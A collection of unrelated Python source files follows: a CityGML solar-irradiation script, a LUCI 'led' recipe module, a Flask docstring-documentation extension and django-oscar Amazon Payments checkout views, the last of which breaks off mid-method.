help='Directory where the enriched "solar" CityGML file(s) should be written.', required=True)
PARSER.add_argument('-f', '--factors',
help='Load the TOF if previously precomputed', required=False)
ARGS = vars(PARSER.parse_args())
DIRECTORY = ARGS['directory']
RESULT = ARGS['results']
FACTORS = ARGS['factors']
#-- Load the pre-computed dictionary
if not FACTORS:
loadDict = False
else:
loadDict = True
#-- If the TOFs are already precomputed
if loadDict:
with open(FACTORS, "rb") as myFile:
TOF_strings = pickle.load(myFile)
TOF = {}
for azStr in TOF_strings:
azFloat = round(float(azStr), 2)
TOF[azFloat] = {}
for tiStr in TOF_strings[azStr]:
tiFloat = round(float(tiStr), 2)
TOF[azFloat][tiFloat] = float(TOF_strings[azStr][tiStr])
TS = sorted(TOF)
res = TS[1]-TS[0]
else:
pass#import knmicloud
def squareVerts(a,t,res):
"""Get the vertices of the interpolation square."""
invRes = 1/res
aB = math.trunc(a*invRes)/invRes
aT = math.ceil(a*invRes)/invRes
if aT == aB:
aT += res#1.0
tB = math.trunc(t*invRes)/invRes
tT = math.ceil(t*invRes)/invRes
if tT == tB:
tT += res#1.0
return [[aB, aT], [tB, tT]]
def bilinear_interpolation(x, y, points):
# Function taken from http://stackoverflow.com/a/8662355/4443114
'''Interpolate (x,y) from values associated with four points.
The four points are a list of four triplets: (x, y, value).
The four points can be in any order. They should form a rectangle.
>>> bilinear_interpolation(12, 5.5,
... [(10, 4, 100),
... (20, 4, 200),
... (10, 6, 150),
... (20, 6, 300)])
165.0
'''
# See formula at: http://en.wikipedia.org/wiki/Bilinear_interpolation
points = sorted(points) # order points by x, then by y
(x1, y1, q11), (_x1, y2, q12), (x2, _y1, q21), (_x2, _y2, q22) = points
if x1 != _x1 or x2 != _x2 or y1 != _y1 or y2 != _y2:
raise ValueError('points do not form a rectangle')
if not x1 <= x <= x2 or not y1 <= y <= y2:
raise ValueError('(x, y) not within the rectangle')
return (q11 * (x2 - x) * (y2 - y) +
q21 * (x - x1) * (y2 - y) +
q12 * (x2 - x) * (y - y1) +
q22 * (x - x1) * (y - y1)
) / ((x2 - x1) * (y2 - y1) + 0.0)
def interpolator(grid_subset, coord):
"""Bilinear interpolation of TOF values."""
#-- Azimuths in the subset grid
azG = np.array(grid_subset[0])
tiG = np.array(grid_subset[1])
values = []
values.append((azG[0], tiG[1], TOF[azG[0]][tiG[1]]))
values.append((azG[0], tiG[0], TOF[azG[0]][tiG[0]]))
values.append((azG[1], tiG[1], TOF[azG[1]][tiG[1]]))
values.append((azG[1], tiG[0], TOF[azG[1]][tiG[0]]))
return bilinear_interpolation(coord[0], coord[1], values)
def irr_from_tof(tilt, azimuth):
"""Construct the square with four TOF values around the point for interpolation."""
gs = squareVerts(azimuth,tilt,res)
return interpolator(gs, [azimuth,tilt])
class Building(object):
def __init__(self, xml, id):
#-- ID of the building
self.id = id
#-- XML tree of the building
self.xml = xml
#-- Data for each roof surface required for the computation of the solar stuff
self.roofdata = {}
#-- List of IDs of openings, not to mess with usable roof surfaces
self.listOfOpenings = []
#-- Compute the total areas of surfaces per semantic class (not really required; reserved for future use)
#-- RoofSurface
self.RoofSurfaceArea = self.roofarea()
#-- WallSurface
self.WallSurfaceArea = self.wallarea()
#-- GroundSurface
self.GroundSurfaceArea = self.groundarea()
#-- Openings
self.OpeningArea = self.openingarea()
#-- All surfaces (including openings)
self.AllArea = self.allarea()
#-- All surfaces without openings
self.RealArea = self.AllArea - self.OpeningArea
#-- Do the solar estimation
self.solarinfo()
def solarinfo(self):
"""Computes the area, azimuth, and tilt for each roof surface (id compulsory)."""
place = (52.01, 4.36)
for roofsurface in self.roofsurfaces:
#-- Skip the openings
if roofsurface.attrib['{%s}id' %ns_gml] in self.listOfOpenings:
continue
#-- Add it to the list
listofxmlroofsurfaces.append(roofsurface)
#-- gml:id of the polygon
pid = roofsurface.attrib['{%s}id' %ns_gml]
#-- Area
area = polygon3dmodule.getAreaOfGML(roofsurface, True)
#-- Compute the normal
norm = polygon3dmodule.getNormal(markup3dmodule.GMLpoints(markup3dmodule.polydecomposer(roofsurface)[0][0]))
#-- Get the azimuth and tilt from the surface normal
az, tilt = polygon3dmodule.getAngles(norm)
az = round(az, 3)
#-- 360 -> 0 degrees
if az == 360.0:
az = 0.0
tilt = round(tilt, 3)
#-- Peculiar problems with the normals, with a cheap solution. Luckily very uncommon.
if tilt == 180:
tilt = 0.0
if tilt >= 180:
tilt = tilt - 180.01
elif tilt > 90:
tilt = tilt - 90.01
elif tilt == 90:
tilt = 89.9
#-- Flat surfaces always have the azimuth zero
if tilt == 0.0:
az = 0.0
#-- If the TOF file is loaded, sample the irradiance
if loadDict:
irradiation = irr_from_tof(tilt, az)
#-- If the TOF file is not loaded, estimate the values
else:
irradiation = irr.yearly_total_irr(place, az, tilt)
#-- Add the values
self.roofdata[pid] = {'area' : area, 'azimuth' : az, 'tilt' : tilt, 'irradiation' : irradiation, 'total_irradiation' : irradiation*area}
roofsurfacedata[pid] = {'area' : area, 'azimuth' : az, 'tilt' : tilt, 'irradiation' : irradiation, 'total_irradiation' : irradiation*area}
#self.roofdata.append([self.id, pid, area, az, tilt, irradiation, irradiation*area])
self.sumIrr = 0
#-- Sum the values for the building
for rs in self.roofdata:
self.sumIrr += self.roofdata[rs]['total_irradiation']
def roofarea(self):
"""The total area of RoofSurface."""
self.roofs = []
self.roofsurfaces = []
roofarea = 0.0
openings = 0.0
for child in self.xml.getiterator():
if child.tag == '{%s}RoofSurface' %ns_bldg:
self.roofs.append(child)
openings += oparea(child)
for surface in self.roofs:
for w in surface.findall('.//{%s}Polygon' %ns_gml):
self.roofsurfaces.append(w)
for roofsurface in self.roofsurfaces:
roofarea += polygon3dmodule.getAreaOfGML(roofsurface, True)
#-- Compute the normal
norm = polygon3dmodule.getNormal(markup3dmodule.GMLpoints(markup3dmodule.polydecomposer(roofsurface)[0][0]))
polygon3dmodule.getAngles(norm)
return roofarea - openings
def wallarea(self):
"""The total area of WallSurfaces."""
self.walls = []
self.wallsurfaces = []
wallarea = 0.0
openings = 0.0
#-- Account for openings
for child in self.xml.getiterator():
if child.tag == '{%s}WallSurface' %ns_bldg:
self.walls.append(child)
openings += oparea(child)
for surface in self.walls:
for w in surface.findall('.//{%s}Polygon' %ns_gml):
self.wallsurfaces.append(w)
for wallsurface in self.wallsurfaces:
wallarea += polygon3dmodule.getAreaOfGML(wallsurface, True)
return wallarea - openings
def groundarea(self):
"""The total area of GroundSurfaces."""
self.grounds = []
groundarea = 0.0
for child in self.xml.getiterator():
if child.tag == '{%s}GroundSurface' %ns_bldg:
self.grounds.append(child)
self.count = 0
for groundsurface in self.grounds:
self.count += 1
groundarea += polygon3dmodule.getAreaOfGML(groundsurface, True)
return groundarea
def openingarea(self):
"""The total area of Openings."""
matching = []
self.openings = []
openingarea = 0.0
for child in self.xml.getiterator():
if child.tag == '{%s}opening' %ns_bldg:
matching.append(child)
#-- Store the list of openings
for o in child.findall('.//{%s}Polygon' %ns_gml):
self.listOfOpenings.append(o.attrib['{%s}id' %ns_gml])
for match in matching:
for child in match.getiterator():
if child.tag == '{%s}surfaceMember' %ns_gml:
self.openings.append(child)
self.count = 0
for openingsurface in self.openings:
self.count += 1
openingarea += polygon3dmodule.getAreaOfGML(openingsurface, True)
return openingarea
def allarea(self):
"""The total area of all surfaces."""
self.allareas = []
allarea = 0.0
# for child in self.xml.getiterator():
# if child.tag == '{%s}surfaceMember' %ns_gml:
# self.allareas.append(child)
self.allareas = self.xml.findall('.//{%s}Polygon' %ns_gml)
self.count = 0
for poly in self.allareas:
self.count += 1
allarea += polygon3dmodule.getAreaOfGML(poly, True)
return allarea
def oparea(xmlelement):
"""The total area of Openings in the XML tree."""
matching = []
openings = []
openingarea = 0.0
for child in xmlelement.getiterator():
if child.tag == '{%s}opening' %ns_bldg:
#print 'opening'
matching.append(child)
for match in matching:
for child in match.getiterator():
if child.tag == '{%s}surfaceMember' %ns_gml:
openings.append(child)
for openingsurface in openings:
openingarea += polygon3dmodule.getAreaOfGML(openingsurface, True)
return openingarea
print "I am Solar3Dcity. Let me search for your CityGML files..."
#-- Find all CityGML files in the directory
os.chdir(DIRECTORY)
for f in glob.glob("*.gml"):
FILENAME = f[:f.rfind('.')]
FULLPATH = DIRECTORY + f
CITYGML = etree.parse(FULLPATH)
root = CITYGML.getroot()
cityObjects = []
buildings = []
listofxmlroofsurfaces = []
roofsurfacedata = {}
#-- Find all instances of cityObjectMember and put them in a list
for obj in root.getiterator('{%s}cityObjectMember'% ns_citygml):
cityObjects.append(obj)
print FILENAME
print "\tThere are", len(cityObjects), "cityObject(s) in this CityGML file"
for cityObject in cityObjects:
for child in cityObject.getchildren():
if child.tag == '{%s}Building' %ns_bldg:
buildings.append(child)
#-- Store the buildings as classes
buildingclasses = []
for b in buildings:
id = b.attrib['{%s}id' %ns_gml]
buildingclasses.append(Building(b, id))
print "\tI have read all buildings, now I will search for roofs and estimate their solar irradiation..."
#-- Store the obtained data in a dictionary
solardata = {}
#-- Check if there are roof surfaces in the file
rsc = 0
#-- Iterate all buildings
for bu in buildingclasses:
solardata[bu.id] = {'roofarea' : bu.roofarea(), 'totalIrradiation' : bu.sumIrr}
rsc += bu.RoofSurfaceArea
if rsc > 0:
print '\tEnriching CityGML file with the solar irradiation data...'
for rsxml in listofxmlroofsurfaces:
rsid = rsxml.attrib['{%s}id' %ns_gml]
s = etree.SubElement(rsxml, "area")
s.text = str(roofsurfacedata[rsid]['area'])
s.attrib['unit'] = 'm^2'
i = etree.SubElement(rsxml, "totalIrradiation")
i.text = str(roofsurfacedata[rsid]['total_irradiation'])
i.attrib['unit'] = 'kWh'
a = etree.SubElement(rsxml, "azimuth")
a.text = str(roofsurfacedata[rsid]['azimuth'])
a.attrib['unit'] = 'degree'
t = etree.SubElement(rsxml, "tilt")
t.text = str(roofsurfacedata[rsid]['tilt'])
t.attrib['unit'] = 'degree'
ni = etree.SubElement(rsxml, "irradiation")
ni.text = str(roofsurfacedata[rsid]['irradiation'])
ni.attrib['unit'] = 'kWh/m^2'
for b in buildings:
bid = b.attrib['{%s}id' %ns_gml]
s = etree.SubElement(b, "roofArea")
s.text = str(solardata[bid]['roofarea'])
s.attrib['unit'] = 'm^2'
i = etree.SubElement(b, "yearlyIrradiation")
i.text = str(solardata[bid]['totalIrradiation'])
i.attrib['unit'] = 'kWh'
os.chdir(RESULT)
with open(RESULT + FILENAME + '-solar.gml', 'w') as f:
f.write(etree.tostring(root))
print "\tFile written."
else:
print "\tI am afraid I did not find any RoofSurface in your CityGML file."
print "All done."
| |
# Copyright 2018 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""An interface to call the led tool."""
from builtins import range
from future.moves.urllib.parse import urlparse
from future.utils import iteritems
import hashlib
import attr
from recipe_engine import recipe_api
from recipe_engine import recipe_test_api
from PB.go.chromium.org.luci.led.job import job
class LedApi(recipe_api.RecipeApi):
"""Interface to the led tool.
"led" stands for LUCI editor. It allows users to debug and modify LUCI jobs.
It can be used to modify many aspects of a LUCI build, most commonly
including the recipes used.
The main interface this module provides is a direct call to the led binary:
led_result = api.led(
'get-builder', ['luci.chromium.try:chromium_presubmit'])
final_data = led_result.then('edit-recipe-bundle').result
See the led binary for full documentation of commands.
"""
@attr.s(frozen=True, slots=True)
class LedLaunchData(object):
swarming_hostname = attr.ib()
task_id = attr.ib()
@property
def swarming_task_url(self):
return 'https://%s/task?id=%s' % (self.swarming_hostname, self.task_id)
class LedResult(object):
"""Holds the result of a led operation. Can be chained using |then|."""
def __init__(self, result, module):
if isinstance(result, LedApi.LedLaunchData):
self._launch_result = result
self._result = result
self._module = None
else:
self._launch_result = None
self._result = result
self._module = module
@property
def result(self):
"""The mutable job.Definition proto message from the previous led call.
If the previous led call was `launch`, then this will be None, and
launch_result will be populated.
"""
return self._result
@property
def launch_result(self):
"""A LedLaunchData object. Only set when the previous led call was
'led launch'."""
return self._launch_result
@property
def edit_rbh_value(self):
"""Returns either the user_payload or cas_user_payload value suitable to
pass to `led edit -rbh`.
Returns `None` if this information is not set.
"""
r = self._result
if r:
if r.cas_user_payload.digest.hash:
return "%s/%d" % (r.cas_user_payload.digest.hash,
r.cas_user_payload.digest.size_bytes)
def then(self, *cmd):
"""Invoke led, passing it the current `result` data as input.
Returns another LedResult object with the output of the command.
"""
if self._module is None: # pragma: no cover
raise ValueError(
'Cannot call LedResult.then on the result of `led launch`')
return self.__class__(
self._module._run_command(self._result, *cmd), self._module)
def __init__(self, props, **kwargs):
super(LedApi, self).__init__(**kwargs)
self._run_id = props.led_run_id
if props.HasField('rbe_cas_input'):
self._rbe_cas_input = props.rbe_cas_input
else:
self._rbe_cas_input = None
if props.HasField('cipd_input'):
self._cipd_input = props.cipd_input
else:
self._cipd_input = None
def initialize(self):
if self._test_data.enabled:
self._get_mocks = {
key[len('get:'):]: value
for key, value in iteritems(self._test_data)
if key.startswith('get:')
}
self._mock_edits = self.test_api.standard_mock_functions()
sorted_edits = sorted([
(int(key[len('edit:'):]), value)
for key, value in iteritems(self._test_data)
if key.startswith('edit:')
])
self._mock_edits.extend(value for _, value in sorted_edits)
@property
def launched_by_led(self):
"""Whether the current build is a led job."""
return bool(self._run_id)
@property
def run_id(self):
"""A unique string identifier for this led job.
If the current build is *not* a led job, value will be an empty string.
"""
return self._run_id
@property
def rbe_cas_input(self):
"""The location of the rbe-cas containing the recipes code being run.
If set, it will be a `swarming.v1.CASReference` protobuf;
otherwise, None.
"""
return self._rbe_cas_input
@property
def cipd_input(self):
"""The versioned CIPD package containing the recipes code being run.
If set, it will be an `InputProperties.CIPDInput` protobuf; otherwise None.
"""
return self._cipd_input
def __call__(self, *cmd):
"""Runs led with the given arguments. Wraps result in a `LedResult`."""
return self.LedResult(self._run_command(None, *cmd), self)
def inject_input_recipes(self, led_result):
"""Sets the version of recipes used by led to correspond to the version
currently being used.
If neither the `rbe_cas_input` nor the `cipd_input` property is set,
this is a no-op.
Args:
* led_result: The `LedResult` whose job.Definition will be passed into the
edit command.
"""
if self.rbe_cas_input:
return led_result.then(
'edit',
'-rbh',
'%s/%s' % (
self.rbe_cas_input.digest.hash, self.rbe_cas_input.digest.size_bytes))
if self.cipd_input:
return led_result.then(
'edit',
'-rpkg', self.cipd_input.package,
'-rver', self.cipd_input.version)
# TODO(iannucci): Check for/inject buildbucket exe package/version
return led_result
def _get_mock(self, cmd):
"""Returns a StepTestData for the given command."""
job_def = None
def _pick_mock(prefix, specific_key):
# We do multiple lookups potentially, depending on what level of
# specificity the user has mocked with.
toks = specific_key.split('/')
for num_toks in range(len(toks), -1, -1):
key = '/'.join([prefix] + toks[:num_toks])
if key in self._get_mocks:
return self._get_mocks[key]
return job.Definition()
if cmd[0] == 'get-builder':
bucket, builder = cmd[-1].split(':', 1)
if bucket.startswith('luci.'):
project, bucket = bucket[len('luci.'):].split('.', 1)
else:
project, bucket = bucket.split('/', 1)
mocked = _pick_mock(
'buildbucket/builder',
'%s/%s/%s' % (project, bucket, builder))
if mocked is not None:
job_def = job.Definition()
job_def.CopyFrom(mocked)
job_def.buildbucket.bbagent_args.build.builder.project = project
job_def.buildbucket.bbagent_args.build.builder.bucket = bucket
job_def.buildbucket.bbagent_args.build.builder.builder = builder
elif cmd[0] == 'get-build':
build_id = str(cmd[-1]).lstrip('b')
mocked = _pick_mock('buildbucket/build', build_id)
if mocked is not None:
job_def = job.Definition()
job_def.CopyFrom(mocked)
job_def.buildbucket.bbagent_args.build.id = int(build_id)
elif cmd[0] == 'get-swarm':
task_id = cmd[-1]
mocked = _pick_mock('swarming/task', task_id)
if mocked is not None:
job_def = job.Definition()
job_def.CopyFrom(mocked)
job_def.swarming.task.task_id = task_id
if job_def is not None:
return self.test_api.m.proto.output_stream(job_def)
ret = recipe_test_api.StepTestData()
ret.retcode = 1
return ret
def _run_command(self, previous, *cmd):
"""Runs led with a given command and arguments.
Args:
* cmd: The led command to run, e.g. 'get-builder', 'edit', along with any
arguments.
* previous: The previous led step's json result, if any. This can be
used to chain led commands together. See the tests for an example of
this.
Ensures that led is checked out on disk before trying to execute the
command.
Returns either a job.Definition or a LedLaunchData.
"""
is_launch = cmd[0] == 'launch'
if is_launch:
kwargs = {
'stdout': self.m.json.output(),
}
if self._test_data.enabled:
# To allow easier test mocking with e.g. the swarming.collect step, we
# take the task_id as build.infra.swarming.task_id, if it's set, and
# otherwise use a fixed string.
#
# We considered hashing the payload to derived the task id, but some
# recipes re-launch the same led task multiple times. In that case they
# usually need to manually provide the task id anyway.
task_id = previous.buildbucket.bbagent_args.build.infra.swarming.task_id
if not task_id:
task_id = 'fake-task-id'
kwargs['step_test_data'] = lambda: self.test_api.m.json.output_stream({
'swarming': {
'host_name': urlparse(self.m.swarming.current_server).netloc,
'task_id': task_id,
}
})
else:
kwargs = {
'stdout': self.m.proto.output(job.Definition, 'JSONPB'),
}
if self._test_data.enabled:
if cmd[0].startswith('get-'):
kwargs['step_test_data'] = lambda: self._get_mock(cmd)
else:
# We run this outside of the step_test_data callback to make the stack
# trace a bit more obvious.
build = self.test_api._transform_build(
previous, cmd, self._mock_edits,
str(self.m.context.cwd or self.m.path['start_dir']))
kwargs['step_test_data'] = (
lambda: self.test_api.m.proto.output_stream(build))
if previous is not None:
kwargs['stdin'] = self.m.proto.input(previous, 'JSONPB')
result = self.m.step(
'led %s' % cmd[0], ['led'] + list(cmd), **kwargs)
if is_launch:
# If we launched a task, add a link to the swarming task.
retval = self.LedLaunchData(
swarming_hostname=result.stdout['swarming']['host_name'],
task_id=result.stdout['swarming']['task_id'])
result.presentation.links['Swarming task'] = retval.swarming_task_url
else:
retval = result.stdout
return retval
| |
from flask import current_app, render_template, render_template_string
import sys
import re
from flask import current_app, render_template, render_template_string
from jinja2 import evalcontextfilter
import flaskredoc.frontend
import flaskredoc.api
from flaskredoc.frontend.views import toc
from flaskredoc import helpStruct, helpPoints, helpGroups
from inspect import getfile
from docutils.core import publish_doctree
import os
try:
from flask import _app_ctx_stack as stack
except ImportError:
from flask import _request_ctx_stack as stack
class ReDoc(object):
def __init__(self, app=None, dmware=None, respfolder=None):
"""
:param app: The flask application
:param dmware: Place Holder for Werkuzug dispatcher middleware
:todo : Add dispatcher middleware support.
:todo : Add support for specifying a response folder
"""
if app is None:
raise KeyError("app cannot be None")
self.app = app
self.init_app(app=app)
self.resp_folder = None
def init_app(self, app=None):
"""
Initializes the flask extension providing teardown
steps.
:param app: Pass in the flask application object.
"""
if hasattr(app, 'teardown_appcontext'):
app.teardown_appcontext(self.teardown)
else:
app.teardown_request(self.teardown)
def teardown(self, exception):
ctx = stack.top
def doc_app(self):
ignr_lst = ['static']
for rl in self.app.url_map.iter_rules():
if rl.endpoint in ignr_lst:
continue
epnt = str(rl)
fname = self.app.view_functions[rl.endpoint].__name__
h = self.proc_docstr(func=self.app.view_functions[rl.endpoint])
h.update({'name': epnt,
"functionName": fname
})
if self.resp_folder is None:
rsp_file = "%s.rsp" % getfile(self.app.view_functions[rl.endpoint]).split('.')[0]
if os.path.isfile(rsp_file):
resps = self.read_responses(func=fname, route=epnt, rsp_file=rsp_file)
if resps is not False:
h.update({'responses': resps})
helpPoints.append({
"name": epnt,
"functionName": fname,
"parent": "/" + "/".join(h['name'].lstrip('/').split('/')[0:-1]),
"summary": h['summary']
})
if h['GROUP']:
for g in h['GROUP']:
print "@@@@@@@@@@@@@@@@@@@@"
obj = [hg for hg in helpGroups if hg['groupName'] == g]
if len(obj) >= 1:
group = obj.pop()
group['endPoints'].append(epnt)
else:
helpGroups.append({"groupName": g,
"endPoints": [epnt]
})
print "@@@@@@@@@@@@@@@@@@@@"
helpStruct.append(h)
def read_responses(self, func=None, route=None, rsp_file=None):
get_ctext = lambda z: " ".join([c.nodeValue for c in z.childNodes if c.nodeType == c.TEXT_NODE])
get_fpar = lambda z: " ".join([c.nodeValue for c in [a for a in z.getElementsByTagName('paragraph')] if c.nodeType == c.TEXT_NODE])
with open(rsp_file, 'r') as r:
rsp = r.read()
resps = []
for sec in publish_doctree(rsp).asdom().getElementsByTagName('section'):
if sec.getAttribute('names') == func or sec.getAttribute('names') == route:
t = {}
for cnode in sec.getElementsByTagName('section')[0].childNodes:
if cnode.nodeName == 'field_list':
fields = {}
for f in cnode.getElementsByTagName('field'):
name = None
for fc in f.childNodes:
if fc.nodeName == 'field_name':
name = get_ctext(fc)
if fc.nodeName == 'field_body' and name:
for p in fc.getElementsByTagName('paragraph'):
fields.update({name: get_ctext(p)})
t.update(fields)
elif cnode.nodeName == 'title':
t.update({'name': get_ctext(cnode)})
elif cnode.nodeName == 'literal_block':
t.update({'response': get_ctext(cnode)})
resps.append(t)
return resps
def proc_docstr(self, func=None):
summary, doc = self.trim(func.__doc__)
hmsg, params = self.find_lines(doc)
hlp = {
"about": doc.split('\n')[
hmsg['hstart']] if hmsg['hstart'] == hmsg['hend'] else '\n'.join(
doc.split('\n')[
hmsg['hstart']:hmsg['hend']]),
"summary": doc.split('\n')[0]}
hlp.update(self.parse_params(params=params, doc=doc))
return hlp
def trim(self, docstring):
if not docstring:
return ''
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Return a single string:
return [
trimmed.pop(0),
'\n'.join(
filter(
lambda y: True if len(
y.strip()) > 0 else False,
trimmed))]
def find_lines(self, doc):
lmark = 0
hstart = 0
hend = 0
lines = doc.split('\n')
params = []
for i in xrange(len(lines)):
if not re.match(r'^\*', lines[i]):
if hstart == 0:
hstart = i
else:
if hend == 0:
hend = i - 1
if i != (len(lines) - 1) and re.match(r'\s+\*', lines[i + 1]):
params.append([i, i + 1])
else:
params.append(i)
return ({"hstart": 0 if hstart == 0 else (hstart - 1),
"hend": 0 if hend == 0 else (hend - 1)},
params)
def parse_params(self, params=None, doc=None):
lns = doc.split('\n')
rsp = {
"GET": [],
"POST": [],
"URL": [],
"CODE": [],
"GROUP": []
}
gfln = lambda x: lns[x].lstrip('*').lstrip().split(':')
gsln = lambda z: re.sub(r'\s+\*', '', lns[z]).split(':')
fhd = lambda y: map(lambda x: x.replace('@', ''), y.split(' '))
urls = []
for p in params:
if type(p).__name__ == 'int':
hd, msg = gfln(p)
hd = fhd(hd)
vd = None
elif type(p).__name__ == 'list':
hd, msg = gfln(p[0])
hd = fhd(hd)
vd = gsln(p[1])
if len(hd) == 1 and hd[0] == 'GROUP':
rsp['GROUP'] = rsp['GROUP'] + msg.strip().split(',')
elif len(hd) == 2:
if hd[0] not in rsp:
continue
if vd:
rsp[hd[0]].append({'name': hd[1],
'message': msg.strip(),
'valid': vd[1]
})
else:
rsp[hd[0]].append({'name': hd[1],
'message': msg.strip()})
elif len(hd) == 3:
urls.append([hd, msg])
if len(urls) > 0:
urls.sort(self.cmp_items)
[rsp['URL'].append(
{"name": url[0][2], "message": url[1], "order": url[0][1]}) for url in urls]
for k in rsp.keys():
if len(rsp[k]) < 1:
del(rsp[k])
return rsp
def cmp_items(self, a, b):
if int(a[0][1]) > int(b[0][1]):
return 1
elif int(a[0][1]) == int(b[0][1]):
return 0
else:
return -1
def create_frontend(self):
return flaskredoc.frontend.app
def create_help_api(self):
return flaskredoc.api.api
| |
import logging
import simplejson
from django.core.urlresolvers import reverse, reverse_lazy
from django.contrib import messages
from django.conf import settings
from django.utils.translation import ugettext as _
from django.shortcuts import redirect, render_to_response
from django.template import RequestContext
from django.views import generic
from django import http
from django.http import HttpResponse, HttpResponseNotFound, HttpResponseForbidden
from oscar.core.loading import get_class, get_model
from oscar.apps.checkout import utils as checkout_utils
from oscar.apps.checkout.views import (
PaymentDetailsView, ShippingMethodView, PaymentMethodView, IndexView)
from models import AmazonPaymentsSession
from api import AmazonPaymentsAPI, AmazonPaymentsAPIError
logger = logging.getLogger("amazon_payments")
Country = get_model('address', 'country')
ShippingAddress = get_model('order', 'ShippingAddress')
Source = get_model('payment', 'Source')
SourceType = get_model('payment', 'SourceType')
Repository = get_class('shipping.repository', 'Repository')
UnableToTakePayment = get_class('payment.exceptions', 'UnableToTakePayment')
PaymentError = get_class('payment.exceptions', 'PaymentError')
CheckoutSessionMixin = get_class('checkout.session', 'CheckoutSessionMixin')
FailedPreCondition = get_class('checkout.exceptions', 'FailedPreCondition')
NoShippingRequired = get_class('shipping.methods', 'NoShippingRequired')
from brit_python.checkout.views import CheckoutView
import oscar
oscar_version_changed = oscar.VERSION[0:2] != (0, 6)
class ShippingMethodMixin(object):
def get_current_shipping_method(self, basket):
session_data = checkout_utils.CheckoutSessionData(self.request)
shipping_method_code = session_data._get('shipping', 'method_code')
shipping_method = Repository().find_by_code(
shipping_method_code,
basket,
)
if not shipping_method:
shipping_method = self.get_default_shipping_method(
basket,
)
return shipping_method
def get_default_shipping_method(self, basket):
return Repository().get_default_shipping_method(
request=self.request,
user=self.request.user,
basket=basket,
)
class AmazonLoginRedirectView(generic.RedirectView):
"""
Redirects to the next step after a user clicks on the
'Pay with Amazon' button.
"""
permanent = False
_redirect_url = reverse_lazy('checkout:amazon-payments-index')
def get_redirect_url(self, **kwargs):
"""
Gets the billing agreement ID and access token created when the
user clicks on the 'Pay with Amazon' button and saves them to the DB,
then redirects to the URL in self._redirect_url.
"""
billing_agreement_id = self.request.GET.get('billing_agreement_id')
access_token = self.request.GET.get('access_token')
if billing_agreement_id:
try:
session = self.request.basket.amazonpaymentssession
except AmazonPaymentsSession.DoesNotExist:
session = AmazonPaymentsSession(basket=self.request.basket)
session.billing_agreement_id = billing_agreement_id
session.access_token = access_token
session.save()
else:
messages.error(self.request,
_("An error occurred during login. Please try again"
" later."))
return reverse('basket:summary')
return self._redirect_url
class AmazonCheckoutView(object):
def init_amazon_payments(self):
"""
Creates a `session` and `api` variables to be used for interacting
with the Amazon Payments API. Returns True if successful, else
returns False
"""
try:
self.session = self.request.basket.amazonpaymentssession
except (AmazonPaymentsSession.DoesNotExist, AttributeError):
return False
logger.debug("Amazon Billing Agreement ID: %s" % (
self.session.billing_agreement_id))
self.api = AmazonPaymentsAPI(
settings.AMAZON_PAYMENTS_ACCESS_KEY,
settings.AMAZON_PAYMENTS_SECRET_KEY,
settings.AMAZON_PAYMENTS_SELLER_ID,
settings.AMAZON_PAYMENTS_API_ENDPOINT,
settings.AMAZON_PAYMENTS_API_VERSION,
settings.AMAZON_PAYMENTS_IS_LIVE,
)
return True
def save_to_db_callback(self, raw_request, raw_response):
return self.session.transactions.create(
request=raw_request, response=raw_response)
def get_amazon_payments_context_vars(self):
"""
Returns a dict with all the Amazon Payments data that would
be needed in a template in order to display widgets.
"""
return {
'amazon_payments_seller_id': settings.AMAZON_PAYMENTS_SELLER_ID,
'amazon_payments_client_id': settings.AMAZON_PAYMENTS_CLIENT_ID,
'amazon_payments_is_live': settings.AMAZON_PAYMENTS_IS_LIVE,
'amazon_payments_billing_agreement_id': (
self.session.billing_agreement_id),
}
def get_amazon_order_details(self, request, **kwargs):
"""
Preforms a GetBillingAgreementDetails request, and checks if
there the user has set a valid shipping address (if
validate_shipping_address is True) and/or there is a valid
payment method (if validate_payment_details is True).
"""
if kwargs.get("validate_shipping_address", True):
kwargs["valid_shipping_countries"] = Country.objects\
.filter(is_shipping_country=True)\
.values_list("iso_3166_1_a2", flat=True)
kwargs["callback"] = self.save_to_db_callback
success, result = self.api.get_amazon_order_details(
self.session.billing_agreement_id, self.session.access_token,
getattr(request.basket, "has_subscriptions", False), **kwargs)
if success:
return result
for error in result:
messages.error(request, _(error))
def check_user_email_is_captured(self, request):
"""
Overrides Oscar's pre-condition to change URL to redirect
to if condition not satisfied.
"""
if not request.user.is_authenticated() \
and not self.checkout_session.get_guest_email():
raise FailedPreCondition(
url=reverse('checkout:amazon-payments-index'),
message=_(
"Please either sign in or enter your email address")
)
def check_basket_requires_shipping(self, request):
"""
Overrides Oscar's pre-condition to change URL to redirect
to if condition not satisfied.
"""
# Check to see that a shipping address is actually required. It may
# not be if the basket is purely downloads
if not request.basket.is_shipping_required():
raise FailedPreCondition(
url=reverse('checkout:amazon-payments-shipping-method'),
message=_(
"Your basket does not require a shipping"
"address to be submitted")
)
def check_shipping_data_is_captured(self, request):
"""
Overrides Oscar's pre-condition to change URL to redirect
to if condition not satisfied.
"""
if not request.basket.is_shipping_required():
return
# Check that shipping address has been completed
if not self.checkout_session.is_shipping_address_set():
raise FailedPreCondition(
url=reverse('checkout:amazon-payments-shipping-address'),
message=_("Please choose a shipping address")
)
# Check that shipping method has been set
if not self.checkout_session.is_shipping_method_set(
request.basket):
raise FailedPreCondition(
url=reverse('checkout:amazon-payments-shipping-method'),
message=_("Please choose a shipping method")
)
class AmazonPaymentsIndexView(IndexView):
success_url = reverse_lazy('checkout:amazon-payments-shipping-address')
class AmazonShippingAddressView(AmazonCheckoutView, CheckoutSessionMixin,
generic.TemplateView):
template_name = 'amazon_payments/shipping_address.html'
pre_conditions = ('check_basket_is_not_empty',
'check_basket_is_valid',
'check_user_email_is_captured',
'check_basket_requires_shipping')
def dispatch(self, *args, **kwargs):
if not self.init_amazon_payments():
messages.error(self.request,
_("Please click on the 'Pay with Amazon' button to "
"begin the Amazon checkout process."))
return redirect('basket:summary')
return super(AmazonShippingAddressView, self).dispatch(
*args, **kwargs)
def get_context_data(self, **kwargs):
